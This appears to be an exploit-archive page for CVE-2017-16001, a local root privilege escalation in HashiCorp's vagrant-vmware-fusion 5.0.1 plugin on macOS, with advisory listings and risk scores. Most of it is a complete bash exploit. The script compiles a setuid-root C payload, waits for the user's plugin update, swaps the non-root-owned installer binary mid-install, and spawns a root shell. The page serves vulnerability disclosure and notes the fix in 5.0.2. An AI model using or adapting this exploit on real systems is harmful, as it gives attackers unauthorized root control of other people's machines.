Hashicorp vagrant-vmware-fusion 5.0.1 Local Privilege Escalation

🗓️ 06 Dec 2017 00:00:00Reported by Mark WadhamType

packetstorm🔗 packetstormsecurity.com👁 36 Views

Hashicorp vagrant-vmware-fusion 5.0.1 Local Privilege Escalation fix in version 5.0.

Reporter	Title	Published	Views	Family All 8
0day.today	Hashicorp vagrant-vmware-fusion 5.0.1 - Local root Privilege Escalation Exploit	6 Dec 201700:00	–	zdt
Circl	CVE-2017-16001	6 Dec 201700:00	–	circl
CNVD	HashiCorp Vagrant VMware Fusion Plugin Permissions Vulnerability	9 Nov 201700:00	–	cnvd
CVE	CVE-2017-16001	6 Nov 201717:00	–	cve
Cvelist	CVE-2017-16001	6 Nov 201717:00	–	cvelist
EUVD	EUVD-2017-7417	7 Oct 202500:30	–	euvd
NVD	CVE-2017-16001	6 Nov 201717:29	–	nvd
Prion	Denial of service	6 Nov 201717:29	–	prion

`# I recently blogged about how the installation process of version 5.0.0 of this  
# plugin could be hihacked by a local attacker or malware in order to escalate  
# privileges to root. Hashicorp pushed some mitigations for this issue fairly  
# quickly but unfortunately 5.0.1 is still exploitable with a slightly different  
# approach.  
  
# They removed the chmod/chown shell commands from their osascript invocation and  
# instead simply executed their installer as root, but apparently didn't realise  
# that the installer is not root-owned so can be swapped out by a local attacker  
# during the process.  
  
# This issue is fixed in version 5.0.2.  
  
# https://m4.rkw.io/vagrant_vmware_privesc_5.0.1.sh.txt  
# c38ecc9fdb4f37323338e8fd12b851133a2121f3505cde664e6d32f1ef49ba23  
# -----------------------------------------------------------------------------  
#!/bin/bash  
echo "########################################"  
echo "vagrant_vmware_fusion 5.0.1 root privesc"  
echo "by m4rkw"  
echo "########################################"  
echo  
echo "compiling..."  
  
cat > vvf.c <<EOF  
#include <unistd.h>  
#include <stdio.h>  
#include <stdlib.h>  
int main(int ac, char *av[])  
{  
setuid(0);  
seteuid(0);  
if (ac > 1) {  
system("mv -f $HOME/.vagrant.d/gems/2.3.4/gems/vagrant-vmware-fusion-5.0.1/ext/vagrant-vmware-desktop/vagrant-vmware-installer_darwin_amd64 /tmp/vvf_exp");  
system("chown root:wheel /tmp/vvf_exp");  
system("chmod 4755 /tmp/vvf_exp");  
system("mv -f $HOME/.vagrant.d/gems/2.3.4/gems/vagrant-vmware-fusion-5.0.1/ext/vagrant-vmware-desktop/vagrant-vmware-installer_darwin_amd64.orig $HOME/.vagrant.d/gems/2.3.4/gems/vagrant-vmware-fusion-5.0.1/ext/vagrant-vmware-desktop/vagrant-vmware-installer_darwin_amd64");  
system("$HOME/.vagrant.d/gems/2.3.4/gems/vagrant-vmware-fusion-5.0.1/ext/vagrant-vmware-desktop/vagrant-vmware-installer_darwin_amd64 install\012");  
return 0;  
}  
system("rm -f /tmp/vvf_exp");  
execl("/bin/bash","bash",NULL);  
return 0;  
}  
EOF  
  
gcc -o /tmp/vvf_exp vvf.c  
rm -f vvf.c  
  
echo "waiting for user to initiate vagrant plugin update..."  
  
while :  
do  
r=`ps auxwww |grep '/usr/bin/osascript -e do shell script' |grep 'vagrant-vmware-installer_darwin_amd64'`  
if [ "$r" != "" ] ; then  
break  
fi  
done  
  
pid=`ps auxww |grep './vagrant-vmware-installer_darwin_amd64 install' |grep -v grep |xargs -L1 |cut -d ' ' -f2`  
  
cd $HOME/.vagrant.d/gems/2.3.4/gems/vagrant-vmware-fusion-5.0.1/ext/vagrant-vmware-desktop  
  
echo "dropping payload in place of installer binary..."  
  
mv -f vagrant-vmware-installer_darwin_amd64 vagrant-vmware-installer_darwin_amd64.orig  
mv -f /tmp/vvf_exp vagrant-vmware-installer_darwin_amd64  
  
echo "waiting for payload to trigger..."  
  
while :  
do  
r=`ls -la /tmp/vvf_exp 2>/dev/null |grep -- '-rwsr-xr-x' |grep root`  
if [ "$r" != "" ] ; then  
echo "spawning shell..."  
/tmp/vvf_exp  
exit 0  
fi  
done  
`

06 Dec 2017 00:00Current

0.6Low risk

Vulners AI Score0.6

EPSS0.00093